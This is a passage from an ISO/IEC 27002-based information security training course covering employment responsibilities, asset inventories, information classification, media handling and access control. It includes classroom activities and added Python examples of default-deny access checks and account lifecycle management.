may also include responsibilities associated with legal and regulatory compliance. Organizations should
also consider what threat to information security an individual might pose if they were to leave the
organization. Are there requirements that need to remain in force even after the person has left? These
are likely to include the above mentioned legal, regulatory and confidentiality requirements, but there
could be others too. These are known as restrictive covenants and should be documented within the
contract of employment along with the period of time they remain valid for.
Changes of responsibility or employment should be managed as the termination of the current
responsibility or employment combined with the initiation of the new responsibility or employment. There
may be responsibilities associated with the old role that need to remain in place, in terms of complying
with contractual requirements, even though the duties performed in the new role are not related. The
requirements of the new role should also be effectively communicated.
For example, if a nurse, with access to sensitive personal information of a patient moves into an
administrative role which requires no such access, the nurse is still required to keep the information they
were privy to during their nursing role confidential. Equally, the confidential elements of the new
administrative function should not be shared with colleagues from the previous role. It is also necessary to
ensure that the starters and leavers process is invoked in order to remove access to the systems and
information available to the nurse in the previous role and add those systems and information assets
related to the new role. See 9.2 for more information about access rights.
ISM02101ENGX v2.0 Nov 2017
Activity 4: Human resource security
Purpose: Determine pre-employment background verification checks for different roles
Duration:
30 minutes in whole class
10 minutes feedback
Directions:
This activity involves the whole class in a tutor-led discussion (flipcharts may be used) on pre-employment
background/screening checks. You will have noticed that the organization chart from Activity 3 included the
following vacancies:
• Internal auditor
• Payroll officer
• Firewall administrator
As a whole group, devise a universal list of background verification checks. Then pick those that are
relevant to the vacancies listed above. When recruiting for each of these 3 roles, what background
verification checks or screening should organizations take? We have provided below a sample list of
suggested screening checks. For each role, are any of the background checks appropriate? If so,
why? Are there any missing checks you would suggest that the class considers?
Sample of background verification checks:
• Identification checks
• Eligibility to work in the UK checks
• Financial records checks
• Criminal records checks (DBS, enhanced DBS?)
• Previous work history (references?)
• Interview
• Security clearance required? (Counter Terrorist Check (CTC) / Security Check (SC) / Developed Vetting (DV))
8 Asset management
Objective: To identify organizational assets and define appropriate protection responsibilities.
8.1.1 Inventory of assets
Assets associated with information and information processing facilities should be identified and an
inventory of these assets should be drawn up and maintained.
In order to ensure that information security controls are implemented in an appropriate manner, an
organization should ensure that it identifies all of the threats and vulnerabilities associated with any
information assets under its control. The first step of this process is to identify the assets. Once
identified, these assets and their associated threats and vulnerabilities need to be continually
monitored and managed. To ensure that all assets continue to be managed, it is advisable to draw up
an inventory of assets so that none are missed. The inventory itself requires ongoing management as
new assets are added and old assets are removed. The inventory of assets in some organizations
may be relatively simple and may include information such as the name of the asset, what its
function is and where it is located. Inventories in other organizations may be more complex and
include information such as asset values, associated threats, information held upon the asset (if it is a
storage device for example), serial numbers, the name of the person to whom the asset is assigned
and the classification of the information.
It is important to ensure that the inventory of assets deals with all information asset types including
the information itself, not just tangible assets such as laptops and desktops. Apart from being
accurate and up to date, it is also important that the asset inventory is consistent and aligned with
other organizational inventories.
When identifying assets, ISO/IEC 27005 can be very useful in providing examples of assets that
might need to be considered. The process of compiling an inventory of assets is an important
prerequisite and cornerstone of effective risk management.
8.1.2 Ownership of assets
Assets maintained in the inventory should be owned.
Within the inventory of assets it is also advisable to identify the owner of the asset. The term ‘owner’
here does not necessarily mean that the individual has property rights over the asset. The term refers
to the individual who has overall responsibility for the operation and protection of the asset, from an
information security perspective.
Ownership is best assigned when assets are created or when assets are transferred to the
organization and the asset owner should be responsible for the asset over the whole of its lifecycle.
The asset owner is ideally responsible for ensuring that assets are:
• Inventoried
• Appropriately classified and protected
• Defined and periodically reviewed from an access restrictions and classification perspective
• Properly handled when they are deleted or destroyed
Routine tasks may be delegated, e.g. to a custodian looking after the assets on a daily basis, but the
responsibility remains with the owner.
In complex information systems, it may be useful to designate groups of assets which act together to
provide a particular service. In this case the owner of this service is accountable for the delivery of
the service, including the operation of its assets.
Discussion: If HR information resides within an HR database which resides on a server, which itself
resides in a data centre, which itself resides in a building and is accessed over both local and wide
area networks (the building is different from the one where the user is accessing the information
from), how many assets are there and who would be the owner of each?
8.1.3 Acceptable use of assets
Rules for the acceptable use of information and of assets associated with information and information
processing facilities should be identified, documented and implemented.
Once the assets have been identified by the organization and added to the inventory, the
organization needs to decide what the asset is designed to be used for and, as importantly, what it is
not designed to be used for. The rules associated with acceptable use should be risk based, i.e. what
user behaviours in relation to specific assets represent an unacceptable risk to the organization. The
rules associated with how users should interact with an asset (and what they are and are not allowed
to use the asset for) should be drawn up into an acceptable use policy. This policy should be
communicated to all relevant users to ensure that user behaviour in relation to all assets is
appropriate and acceptable. For example, some organizations may decide that a certain level of
personal use of mobile phones, email systems and access to the internet is acceptable. Other
organizations may not.
8.1.4 Return of assets
All employees and external party users should return all of the organizational assets in their
possession upon termination of their employment, contract or agreement.
Upon employment, organizations are likely to allocate assets to individual users. This allocation needs
to be tracked as these assets will need to be recovered if the user leaves the organization or possibly
when changing role. There are obvious assets that should be recovered when an individual leaves an
organization, such as mobile phones and laptops. Other assets may include photo ID cards, proximity
cards or fobs that allow the user to access controlled areas, and two-factor authentication tokens. The
user may also habitually work from home. Have they accumulated information assets at home on
paper or on local personal equipment? If so, arrangements need to be made for these to be
transferred and for the information to be securely erased from the personal equipment (see 11.2.7).
There are intangible assets as well. Where an individual or external party user has knowledge that is
important to ongoing operations, that information should be documented and transferred to the
organization.
During the notice period of termination, the organization should ensure that unauthorized copying of
relevant information (e.g. intellectual property) by terminated employees and contractors is tightly
monitored and controlled.
8.2 Information classification
Objective: To ensure that information receives an appropriate level of protection in accordance with
its importance to the organization.
8.2.1 Classification of information
Information should be classified in terms of legal requirements, value, criticality and sensitivity to
unauthorized disclosure or modification.
Information classification should take account of business needs for sharing or restricting information,
as well as legal requirements. Assets other than information can also be classified in conformance
with the classification of information which is stored in, processed by or handled or protected by the
asset. Information should be protected appropriately in terms of the risk posed to the organization if
it were to be compromised.
As per 8.1.2 owners of information assets should be accountable for their classification.
The level of protection in the scheme should be assessed by analysing confidentiality, integrity and
availability and any other requirements for the information considered. The scheme should be aligned
to the access control policy (see 9.1.1).
Each level should be assigned a name that makes sense in the context of the classification scheme’s
application. It is paramount that the scheme is consistent across the whole organization so that
everyone will classify information and related assets in the same way, have a common understanding
of protection requirements and apply the appropriate protection. A typical commercial classification
scheme may have the following classification levels:
• Secret (disclosure has a serious impact on long term strategic objectives or puts the survival of
the organization at risk)
• Client confidential (disclosure has a significant short term impact on operations or tactical
objectives)
• Internal use only (disclosure causes minor embarrassment or minor operational inconvenience)
• Public (disclosure causes no harm)
The example classification scheme above is hopefully fairly self explanatory. Information with a
classification of ‘public’ would cause no impact on the organization if it were to be released into the
public domain. Information classified as ‘internal use only’ is designed to be shared among employees
of the organization, but is not designed to be made available to the general public, e.g. staff
newsletter. If it were to be released it is likely that there may be some negative consequences, but
these are not likely to cause significant harm. ‘Client confidential’ information is all about protecting the
information associated with the organization’s customers and if released could cause a breach of
contract which in turn could lead to severe penalties and a potential loss of business. Information at
the ‘secret’ level is likely to be made available to only those named individuals who need it. To share it
wider could lead to severe negative consequences for the organization.
Classification should be included in the organization’s processes, and be consistent and coherent across
the organization. Results of classification should indicate value of assets depending on their sensitivity
and criticality to the organization, e.g. in terms of not just confidentiality, but also integrity and
availability. Results of classification should be updated in accordance with changes of their value,
sensitivity and criticality through their life-cycle.
Classification provides users with a concise indication of how to handle and protect information.
Creating groups of information with similar protection needs and specifying information security
procedures that apply to all the information in each group facilitates this. This approach reduces the
need for case-by-case risk assessment and custom design of controls.
It should also be noted that information classification can vary, e.g. financial reports of a listed
company can be highly sensitive up to the formal publication date, but beyond that, the information
becomes ‘public’. These aspects should be taken into account, as over-classification can lead to the
implementation of unnecessary controls resulting in additional expense and, vice versa, under-classification
can endanger the achievement of business objectives.
8.2.2 Labelling of information
An appropriate set of procedures for information labelling should be developed and implemented in
accordance with the information classification scheme adopted by the organization.
Once the classification scheme has been developed, the organization needs to determine how
information at different classifications is to be identified. Simple labelling would ensure that anyone
who comes across information will be able to identify its classification and thus treat it appropriately
without the need for reading the information itself. Labels should be considered for implementation
particularly when the asset is in tangible form, i.e. printed on paper or stored on CDs or on USB devices
etc. Caution should be used however, as to label an asset may also draw attention to it.
Another decision required to be taken by the organization is to what to do when an information asset is
found to not have a label. A default position should be decided upon and included within any
classification policy documentation. Some risk averse organizations may opt to treat all information that
is unlabelled as confidential or secret. However, this can lead to extensive over-classification. Other
organizations may decide that any unlabelled information should be treated as public. This gets around
the problem of having to label marketing material etc., but may lead to sensitive information being
available in the public domain. Each organization should take an approach that is best suited to its
business needs and objectives.
8.2.3 Handling of assets
Procedures for handling assets should be developed and implemented in accordance with the
information classification scheme adopted by the organization.
Procedures should be drawn up for handling, processing, storing and communicating information
consistent with its classification (see 8.2.1). A set of handling guidelines should also be produced that
define the characteristics of each classification level in terms of how the information at each level
should be treated and handled. The whole lifecycle of the information should be considered when
producing these handling guidelines, i.e. creation, storage, communication and disposal. Guidelines for
each level and for each stage in the information’s lifecycle should be determined for both electronic and
paper based information.
For example, paper based ‘secret’ information may need to be stored in a locked cupboard to which only
named individuals have keys. The same information in electronic format may need to be stored in a shared
folder to which only those named individuals have access and, furthermore, the
information may need to be encrypted. When sensitive information is disposed of, it is likely to be
either cross-cut shredded (paper) or securely wiped (electronic). Public information on the other hand
will probably not require such protection and can be disposed of with other waste products. The
electronic version of public information can be stored on local drives or in public folders with no
requirement for access control or encryption and can simply be deleted when no longer required.
When drawing up handling procedures and guidelines, organizations need to consider:
• Access restrictions supporting the protection requirements for each classification level
• Maintaining a formal record of the authorized recipients of assets
• Protecting temporary or permanent copies of information
• Storing IT assets in accordance with manufacturers’ specifications
• Clear marking of all copies of media for the attention of the authorized recipient
Care should be taken in transferring information between organizations as classifications may not be
equivalent even if the names for levels are similar. In addition, information moving between
organizations can vary in classification depending on its context in each organization, even if their
classification schemes are identical. Agreements with other organizations that include information
sharing should include procedures to identify the classification of that information and to interpret the
classification labels from other organizations.
8.3 Media handling
Objective: To prevent unauthorized disclosure, modification, removal or destruction of information stored
on media.
8.3.1 Management of removable media
Procedures should be implemented for the management of removable media in accordance with the
classification scheme adopted by the organization.
The use of removable media should be considered carefully by all organizations. One of the attractions of
removable media such as USB sticks, portable hard drives, CDs and DVDs (their small, compact nature, which
makes large files easy to transport) also represents a significant security threat (they are easy to lose and a
perfect target for thieves). Organizations are often advised to avoid using removable media wherever
possible, but where this is not the case, ISO/IEC 27002 provides some useful guidelines for organizations
to consider in the management of removable media:
• If no longer required, the contents of any re-usable media that are to be removed from the
organization should be made unrecoverable
• Where necessary and practical, authorization should be required for media removed from the
organization and a record of such removals should be kept in order to maintain an audit trail
• All media should be stored in a safe, secure environment, in accordance with manufacturers’
specifications
• If data confidentiality or integrity are important considerations, cryptographic techniques should be
used to protect data on removable media
• To mitigate the risk of media degrading while stored data are still needed, the data should be
transferred to fresh media before becoming unreadable
• Multiple copies of valuable data should be stored on separate media to further reduce the risk of
coincidental data damage or loss
• Registration of removable media should be considered to limit the opportunity for data loss
• Removable media drives should only be enabled if there is a business reason for doing so
• Where there is a need to use removable media the transfer of information to such media should be
monitored
8.3.2 Disposal of media
Media should be disposed of securely when no longer required, using formal procedures.
Media used to store information will eventually get to the end of its useful life and so consideration
needs to be given to what happens to it at this point. If the information held upon the media needs
to be retained then the organization should ensure that it is copied across to new media. The old
media should then be disposed of in accordance with the requirements of the information
classification scheme and the associated handling guidelines. The procedures for secure disposal of
media containing confidential information should be proportional to the sensitivity of that information.
ISO/IEC 27002 provides a list of considerations when disposing of media:
• Media containing confidential information should be stored and disposed of securely, e.g. by
incineration or shredding, or erasure of data for use by another application within the organization
• Procedures should be in place to identify the items that might require secure disposal
• It may be easier to arrange for all media items to be collected and disposed of securely, rather
than attempting to separate out the sensitive items
• Many organizations offer collection and disposal services for media; care should be taken in
selecting a suitable external party with adequate controls and experience
• Disposal of sensitive items should be logged in order to maintain an audit trail
It should be noted that when accumulating media for disposal, consideration should be given to the
aggregation effect, which can cause a large quantity of non-sensitive information to become
sensitive.
8.3.3 Physical media transfer
Media containing information should be protected against unauthorized access, misuse or corruption
during transportation.
If media is being used to transport information from one place to another then consideration should
be given to how it is transported. If the information contained on the media is confidential then there
may be a requirement for the use of a secure courier or an employee-only face-to-face handover
to avoid any unauthorized access. When using external couriers, a list of authorized couriers needs to
be agreed with management and a procedure should be developed to verify the identification of the
couriers when media is being collected. Consideration also needs to be given to the packaging of
media in transit to protect against physical damage and environmental factors e.g. heat and
moisture.
Where sensitive information on media is not encrypted, additional compensating controls should be
considered.
Logs should also be maintained which record key details such as content, protection, transit times,
destination etc.
Note that for controls 8.3.2 and 8.3.3, paper is also considered to be media and should be
considered as part of the information classification and handling guidelines.
Activity 5: Asset management
Purpose: To identify and classify information assets.
Duration:
25 minutes pairs/groups
15 minutes feedback
Directions:
In pairs or small groups assigned by your tutor, your mission is to assist ABC Organization Ltd in
identifying its key information assets. It has never completed this exercise before and is not clear on
what constitutes an information asset. ABC Organization Ltd has asked for your help in completing
this.
It has made a start on the process of identifying assets and, in its first attempt, has come up with the
following categories of assets:
• Software
• Physical
• Information
• People
• Intangible
• Services and systems
So far, ABC Organization Ltd has identified 22 information assets but has not allocated these into the
appropriate categories.
Task 1:
Place the 22 assets listed in the table below into the correct categories by entering the category in
the space provided.
Task 2:
Indicate in the ‘value’ column which characteristic of information security is the most important by
placing a ‘C’, ‘I’ or ‘A’ into the column for confidentiality, integrity or availability. If you think that 2 or
3 characteristics are equally important, feel free to enter two or three letters in the column.
If you think that any assets listed are not relevant to information security, then place an X in the
column.
Task 3:
From the organization chart used in Activity 3, identify in the owner column a suitable owner for the
asset. If you believe that there is a more suitable information asset owner that is not specified in the
organization chart feel free to complete the owner column accordingly.
Asset                      | Category   | Value | Owner
---------------------------|------------|-------|------------
Laptops                    | Technology | C, I  | IT Director
Technology staff           |            |       |
Electrical supply          |            |       |
Communications room        |            |       |
Mobile phones              |            |       |
Website source code        |            |       |
Distribution centres       |            |       |
Head office building       |            |       |
Customer feedback          |            |       |
Payroll information        |            |       |
Reputation                 |            |       |
Change management process  |            |       |
Vending machine            |            |       |
Car parking                |            |       |
Security guards            |            |       |
Staff screening records    |            |       |
HR staff                   |            |       |
Brand                      |            |       |
Web servers                |            |       |
Desktop pcs                |            |       |
Training material          |            |       |
Internal audit reports     |            |       |
9.1 Business requirements of access control
Objective: To limit access to information and information processing facilities.
9.1.1 Access control policy
An access control policy should be established, documented and reviewed based on business and
information security requirements.
As part of the process of determining what information assets an organization needs to protect, it is
important to also understand which roles (and therefore users) are required to have access to the
assets in order to perform their duties. Access to information and the supporting information systems
should be restricted based on the requirements of the role and reflecting the associated information
security risks. This can be achieved in a number of ways and will vary across organizations and can
involve both logical and physical controls. However, ultimately, it is the information that drives the
level of protection required and there should be a valid business justification for access which has
been approved by an appropriate authority. Furthermore, users and service providers should be
provided with a clear statement of the business requirements to be met by access controls.
It is important to document who requires access to different information assets and under what
circumstances and what controls need to be in place in order to control such access. This
requirement is satisfied by the Access Control Policy and it is this vehicle which communicates the
business’ requirements for access to users, administrators, managers and other interested parties.
Some organizations may have a number of different systems that require specific access policies to
be defined. This can make the Access Control Policy sometimes large, complex and unwieldy. The
use of a role matrix may be useful as it enables the reader to quickly ascertain which roles require
access to different information and supporting systems.
Two of the frequent principles directing the access control policy are:
• Need-to-know: You are only granted access to the information you need to perform your tasks
(different tasks/roles mean different need-to-know and hence different access profile)
• Need-to-use: You are only granted access to the information processing facilities (IT equipment,
applications, procedures, rooms) you need to perform your task/job/role
The controls required to manage access appropriately should also be documented within an access
control policy.
An access control policy should ideally take account of the following considerations:
• Security requirements of information
• Policies for information dissemination and authorization
• Consistency between access rights and information classification policies
• Relevant legislation and any contractual obligations (see 18.1)
• Management of access rights in a distributed and networked environment
• Segregation of access control roles
• Requirements for formal authorization of access requests (see 9.2.1 and 9.2.2)
• Periodic review of access rights (see 9.2.5)
• Removal of access rights (see 9.2.6)
• Archiving of records of all significant events
• Roles with privileged access (see 9.2.3)
Care should be taken when specifying access control rules. It is often recommended to adopt an
‘everything is generally forbidden unless expressly permitted’ approach rather than the weaker rule
‘everything is generally permitted unless expressly forbidden’.
Access control rules should be supported by formal procedures (see 9.2, 9.3, 9.4) and defined
responsibilities (see 6.1.1, 9.3).
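The role matrix and the ‘forbidden unless expressly permitted’ rule described above, worked through as an added example (this code is not part of the BSI course material or of the standard). The roles, assets and user assignments are constructed sample data; the deny-list variant is included only to illustrate the weaker rule the text warns against:

```python
"""Role matrix with default-deny access evaluation (added example; constructed sample data)."""
from typing import Dict, FrozenSet, List, Set, Tuple

# Constructed role matrix: each role lists the (asset, permission) pairs it is
# expressly permitted. Anything not listed here is forbidden.
ROLE_MATRIX: Dict[str, FrozenSet[Tuple[str, str]]] = {
    "payroll-clerk": frozenset({("payroll-db", "read"), ("payroll-db", "write")}),
    "hr-analyst": frozenset({("payroll-db", "read"), ("hr-records", "read")}),
    "network-admin": frozenset({("core-switch", "configure")}),
}

# Constructed user-to-role assignment; a user may hold several roles.
USER_ROLES: Dict[str, Set[str]] = {
    "alice": {"payroll-clerk"},
    "bob": {"hr-analyst", "network-admin"},
}


def is_permitted(user: str, asset: str, permission: str) -> bool:
    """'Everything is forbidden unless expressly permitted': grant only when a
    role held by the user explicitly lists this (asset, permission) pair."""
    for role in USER_ROLES.get(user, set()):
        if (asset, permission) in ROLE_MATRIX.get(role, frozenset()):
            return True
    return False


# The weaker rule, shown for contrast: a deny list of forbidden pairs.
DENY_LIST: Set[Tuple[str, str]] = {("payroll-db", "write")}


def is_permitted_weak(user: str, asset: str, permission: str) -> bool:
    """'Everything is permitted unless expressly forbidden': any asset that
    nobody thought to add to the deny list is reachable by every user."""
    return (asset, permission) not in DENY_LIST


def roles_requiring(asset: str) -> Set[str]:
    """The question a role matrix is meant to make quick to answer:
    which roles need any access to this asset?"""
    return {role for role, perms in ROLE_MATRIX.items()
            if any(a == asset for a, _ in perms)}


def review_assignments(user_roles: Dict[str, Set[str]],
                       role_matrix: Dict[str, FrozenSet[Tuple[str, str]]]) -> List[str]:
    """Periodic review helper: flag users holding roles the matrix never defined."""
    problems = []
    for user, roles in user_roles.items():
        for role in sorted(roles):
            if role not in role_matrix:
                problems.append(f"{user}: role '{role}' is not defined in the matrix")
    return problems
```

With the default-deny function a user with no role at all, or a newly added asset that no role lists, is refused; with the deny-list variant the same newly added asset is open to everyone until someone remembers to forbid it.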
9.1.2 Access to networks and network services
Users should only be provided with access to the network and network services that they have been
specifically authorized to use.
The access control policy (9.1.1) is often used to document access to other supporting infrastructure
such as networks and networking equipment. Sometimes a separate policy may be developed. In the
same way as access to information and systems requires a business justification, so does the need to
access specific networks and network services and equipment. For example, the business justification
to access services across a wifi network may be different to the wired network, and access to
services and systems on the finance network may be different to the device management network.
Whether combined with the access control policy or developed independently, the policy for access
to networks and network services should cover:
• Types of networks and network services which can be accessed
• Authorization procedures for determining who is allowed access
• Management controls and procedures
• Means used to access networks e.g. VPN or wireless network
• User authentication requirements
• Monitoring network services
9.2 User access management
Objective: To ensure authorized user access and to prevent unauthorized access to systems and
services.
9.2.1 User registration and de-registration
A formal user registration and de-registration process should be implemented to enable assignment
of access rights.
A key component of access control is the need for a reliable and formal registration and
de-registration process for users on various systems and networks. The process needs to be appropriate
and consistent, in line with the business requirements defined in the Access Control Policy. It is
important for the process to be documented, particularly where there may be a number of people
and/or departments (e.g. HR, Facilities, IT) involved. The process should include a requirement for all
usernames to be unique so that users can be linked and held responsible for their actions. It is
recommended that special consideration is given and appropriate authority sought for usernames
that need to be shared for business or operation reasons. The process should also ensure that access
to systems is revoked immediately when a user changes roles or leaves the organization. The
resulting IDs should not be re-used. There should also be periodic reviews when redundant user IDs
are removed or disabled.
9.2.2 User access provisioning
A formal user access provisioning process should be implemented to assign or revoke access rights
for all user types to all systems and services.
When provisioning a new user, and particularly in large, complex organizations or where there are a
number of users or departments involved in the user access provisioning, the process should be
documented in order to provide reliable, repeatable and consistent results. The provisioning process
for assigning or revoking access rights granted to user IDs should include:
• Obtaining authorization from the owner of the information system or service (see 8.1.2); separate
approval for access rights from management may also be appropriate
• Verifying that the level of access granted is appropriate to the access policies (see 9.1) and is
consistent with other requirements such as segregation of duties (see 6.1.2)
• Ensuring that access rights are not activated (e.g. by service providers) before authorization
procedures are completed
• Maintaining a central record of access rights granted to a user ID to access information systems
and services
• Adapting access rights of users who have changed roles or jobs and immediately removing or
blocking access rights of users who have left the organization
• Reviewing (periodically) access rights with owners of the information systems or services (see
9.2.5)
9.2.3 Management of privileged access rights
The allocation and use of privileged access rights should be restricted and controlled.
Particular care should be taken when creating user accounts that have special privileges. Such
privileges such as superuser accounts and manager accounts within the various systems in use
should be documented within the Access Control Policy and the roles should also be identified that
require such levels of access. Where possible, such elevated privileges should only be granted on a
‘need-to-use’ basis and on an ‘event-by-event’ basis in line with the access control policy (see 9.1.1),
i.e. based on the minimum requirement for their functional roles.
Such privileges should be revoked when not being used. It is also suggested that time limits are
associated with the use of privileged accounts so that they can only be used for certain periods of
time or at certain times of the day or only on certain days of the week to reduce the possibility of
misuse. Privileged access rights should also be assigned to a user ID different from those used for
regular business activities. Regular business activities should not be performed from a privileged user
ID.
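One way to enforce the ‘event-by-event’ and time-limited use of privileged IDs described in 9.2.3, as an added example rather than anything from the course or the standard. It assumes a naming convention for this example only (privileged IDs end in ‘-adm’ and are distinct from everyday IDs); the change ticket, dates, weekdays and hours are constructed sample values:

```python
"""Time-bounded, event-based privileged access check (added example)."""
from dataclasses import dataclass
from datetime import datetime, time
from typing import FrozenSet, List

# Constructed everyday (non-privileged) user IDs. Assumption for this example:
# privileged rights sit on separate accounts named with an '-adm' suffix.
REGULAR_IDS = {"alice", "bob"}


@dataclass(frozen=True)
class PrivilegedGrant:
    admin_id: str                      # the separate privileged ID, never the everyday ID
    ticket: str                        # approved change or incident the grant is tied to
    not_before: datetime               # validity window of the grant (the 'event')
    not_after: datetime
    allowed_weekdays: FrozenSet[int]   # 0 = Monday ... 6 = Sunday
    window_start: time                 # permitted time of day
    window_end: time


def is_privileged_id(account: str) -> bool:
    """Privileged rights must be assigned to an ID different from the regular one."""
    return account.endswith("-adm") and account not in REGULAR_IDS


def denial_reasons(grant: PrivilegedGrant, account: str, now: datetime) -> List[str]:
    """Every reason the use is refused; an empty list means the use is allowed."""
    reasons = []
    if account != grant.admin_id:
        reasons.append("account does not match the grant")
    if not is_privileged_id(account):
        reasons.append("not a separate privileged ID")
    if not (grant.not_before <= now <= grant.not_after):
        reasons.append(f"outside validity window of ticket {grant.ticket}")
    if now.weekday() not in grant.allowed_weekdays:
        reasons.append("not an allowed day of the week")
    if not (grant.window_start <= now.time() <= grant.window_end):
        reasons.append("outside the allowed time of day")
    return reasons


def privileged_use_allowed(grant: PrivilegedGrant, account: str, now: datetime) -> bool:
    return not denial_reasons(grant, account, now)
```

Returning the full list of reasons rather than a bare yes/no makes the refusal reviewable: a monitoring process can see whether privileged IDs are being tried outside their window, on the wrong day, or from an everyday account.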
9.2.4 Management of secret authentication information of users
The allocation of secret authentication information should be controlled through a formal
management process.
One of the biggest weaknesses associated with the use of authentication information (e.g.
passwords, smart codes) is carelessness or misunderstanding on the part of users on how this
information should be protected. The organization should ensure that it educates its users on the use
of authentication information to prevent accounts being misused (e.g. do not write down passwords,
do not share passwords, use different passwords for different systems etc.). Users should choose
their own passwords, but be educated on developing strong passwords. Users should be required to
sign a statement to keep personal secret authentication information confidential and to keep group
(i.e. shared) secret authentication information solely within the members of the group. When users
are required to maintain their own secret authentication information they should be provided initially
with secure temporary secret authentication information, which they are forced to change on first
use. The temporary
secret authentication information should be unique to an individual and should not be guessable. The
organization also needs to develop procedures to verify the identity of a user prior to providing new,
replacement or temporary secret authentication information. There also should be a requirement on
users to acknowledge receipt of secret authentication information.
Authentication information often comes pre-configured in some systems to enable initial access ‘out of
the box’. These should always be changed to a complex password that cannot be guessed to reduce
the likelihood of unauthorized access to the organization’s systems and information.
9.2.5 Review of user access rights
Asset owners should review users’ access rights at regular intervals.
System and information asset owners should ensure that they review the users who have access to
their systems to ensure that the access remains appropriate. This review should be conducted regularly
or after any change or termination of employment. The level of access (i.e. privileges) within those
systems should be reviewed at more frequent intervals.
Any user accounts that have not been used for a certain length of time should be disabled or removed
along with those accounts that belong to users who should no longer have access to the system.
It should be noted that this control can compensate for possible weaknesses in the execution of
controls 9.2.1, 9.2.2 and 9.2.6.
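The registration, provisioning and review steps of 9.2.1, 9.2.2 and 9.2.5 tied together in one piece of code, as an added example that is not from the course or the standard. Names, dates and the 90-day dormancy threshold are constructed values; the dual approval (owner of the system or service plus management) follows the first bullet of the provisioning list above:

```python
"""Central access registry: unique IDs, authorized provisioning, periodic review (added example)."""
from dataclasses import dataclass, field
from datetime import date, timedelta
from typing import Dict, List, Optional, Set


@dataclass
class Account:
    user_id: str
    owner: str                              # individual accountable for actions under this ID
    roles: Set[str] = field(default_factory=set)
    status: str = "pending"                 # pending -> active -> disabled / removed
    last_used: Optional[date] = None
    shared: bool = False                    # shared IDs need explicit extra authority


@dataclass
class AccessRequest:
    user_id: str
    role: str
    approved_by_owner: bool = False         # owner of the information system or service
    approved_by_manager: bool = False       # separate management approval


class AccessRegistry:
    """The central record of IDs and of the access rights granted to them."""

    def __init__(self) -> None:
        self._accounts: Dict[str, Account] = {}
        self._retired_ids: Set[str] = set()  # IDs of leavers, never handed out again
        self.log: List[str] = []

    def register(self, user_id: str, owner: str, shared: bool = False,
                 shared_authority: Optional[str] = None) -> Account:
        if user_id in self._accounts or user_id in self._retired_ids:
            raise ValueError(f"user ID '{user_id}' is not unique or has been used before")
        if shared and not shared_authority:
            raise ValueError("a shared ID needs a named approving authority")
        acct = Account(user_id=user_id, owner=owner, shared=shared)
        self._accounts[user_id] = acct
        self.log.append(f"registered {user_id} for {owner}")
        return acct

    def provision(self, req: AccessRequest) -> None:
        """Rights are activated only once every required authorization is present."""
        if not (req.approved_by_owner and req.approved_by_manager):
            raise PermissionError("access must not be activated before authorization is complete")
        acct = self._accounts[req.user_id]
        acct.roles.add(req.role)
        acct.status = "active"
        self.log.append(f"granted {req.role} to {req.user_id}")

    def adjust_on_role_change(self, user_id: str, roles_still_required: Set[str]) -> Set[str]:
        """Mover: drop rights the new role no longer needs; additions go through provision()."""
        acct = self._accounts[user_id]
        removed = acct.roles - roles_still_required
        acct.roles -= removed
        self.log.append(f"removed {sorted(removed)} from {user_id} on role change")
        return removed

    def deregister(self, user_id: str) -> None:
        """Leaver: revoke everything immediately and retire the ID so it is never re-used."""
        acct = self._accounts.pop(user_id)
        acct.roles.clear()
        acct.status = "removed"
        self._retired_ids.add(user_id)
        self.log.append(f"removed {user_id}")

    def record_use(self, user_id: str, when: date) -> None:
        self._accounts[user_id].last_used = when

    def review(self, today: date, dormant_after: timedelta = timedelta(days=90)) -> List[str]:
        """Periodic review (9.2.5): disable IDs unused for longer than the threshold."""
        findings = []
        for acct in self._accounts.values():
            if acct.status != "active":
                continue
            if acct.last_used is None or today - acct.last_used > dormant_after:
                acct.status = "disabled"
                findings.append(f"{acct.user_id} disabled: last used {acct.last_used}")
        return findings

    def rights_of(self, user_id: str) -> Set[str]:
        return set(self._accounts[user_id].roles) if user_id in self._accounts else set()

    def status_of(self, user_id: str) -> str:
        return self._accounts[user_id].status if user_id in self._accounts else "removed"
```

The retired-ID set is what makes the ‘IDs should not be re-used’ rule enforceable rather than a matter of memory, and the review method is the compensating check the text mentions: even if a leaver slipped through deregistration, a dormant ID is disabled at the next review.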
9.2.6 Removal or adjustment of access rights
The access rights of all employees and external party users to information and information processing
facilities should be removed upon termination of their employment, contract or agreement, or adjusted
upon change.
When a user leaves an organization, the access rights they had to information or systems involved in
information processing should be revoked in a timely manner. The value of the assets that the user had
access to, the current responsibilities of the user and the circumstances under which they left the
organization should all be taken into consideration in determining how quickly the revocation takes
place. In some circumstances (e.g. disciplinary processes which result in termination of employment)
the revocation should take place immediately. In cases of management-initiated termination,
disgruntled employees or external party users can deliberately corrupt information or sabotage
information processing facilities. In cases of persons resigning or being dismissed, they may be
tempted to collect information for future use.
Where users move to a different part of the organization, access should be revoked to the information
and systems to which they no longer require access to perform the duties of their role. If the user was
part of a group of users that had access to a shared ID, the user should be removed from the group
and all other members of the group should be informed to ensure that information to which the
departing user no longer requires access is not shared. As well as revoking logical access, physical
access also needs to be considered. Removal or adjustment can be done by removal, revocation or
replacement of keys, identification cards, information processing facilities or subscriptions.
9.3 User responsibilities
Objective: To make users accountable for safeguarding their authentication information.
9.3.1 Use of secret authentication information
Users should be required to follow the organization’s practices in the use of secret authentication
information.
Users should be advised on their responsibilities when using secret authentication information (e.g.
passwords) and how that information should be protected. They should be advised never to divulge
their secret authentication information, even to authority figures. Users need to be advised on how to
choose a strong yet easy-to-remember password, i.e. one they do not need to write down. For
example, the password should not be based on the username and should not incorporate easy to
research information such as dates of birth or names of family members. The password should also
not be a dictionary word as these things are all easy to guess and make the password weaker.
Passwords should also be free of consecutive identical, all-numeric or all-alphabetic characters. Users
should be advised that the passwords they use in their personal lives should be different to the ones
they use in the workplace. This is often because the business requirements for security are more
stringent than that required for personal accounts. Users should be educated with regard to issues
such as social networking where attackers may use social techniques to extract sensitive information
from users such as passwords. If users believe there is even the slightest possibility of password
compromise, they should change it immediately.
9.4 System and application access control
Objective: To prevent unauthorized access to systems and applications.
9.4.1 Information access restriction
Access to information and application system functions should be restricted in accordance with the
access control policy.
When considering the business requirements for access to information and systems and documenting
this within the Access Control Policy, organizations should ensure that they consider all possibilities
for access to information. For example, the ability to run reports within a system may provide outputs
which contain information to which the user may not normally have access. The way in which this
type (and other types) of functionality within a system can be restricted should therefore be analysed
and implemented. For example, the provision of a menu system to provide access to certain types of
functionality should be considered with users that have lower privileges within the system being
restricted from seeing and accessing the menu options that would otherwise be available.
Other types of restrictions to be considered include restricting users to ‘read only’ access, restricting
users from sharing information with others or limiting the information contained in outputs. The use
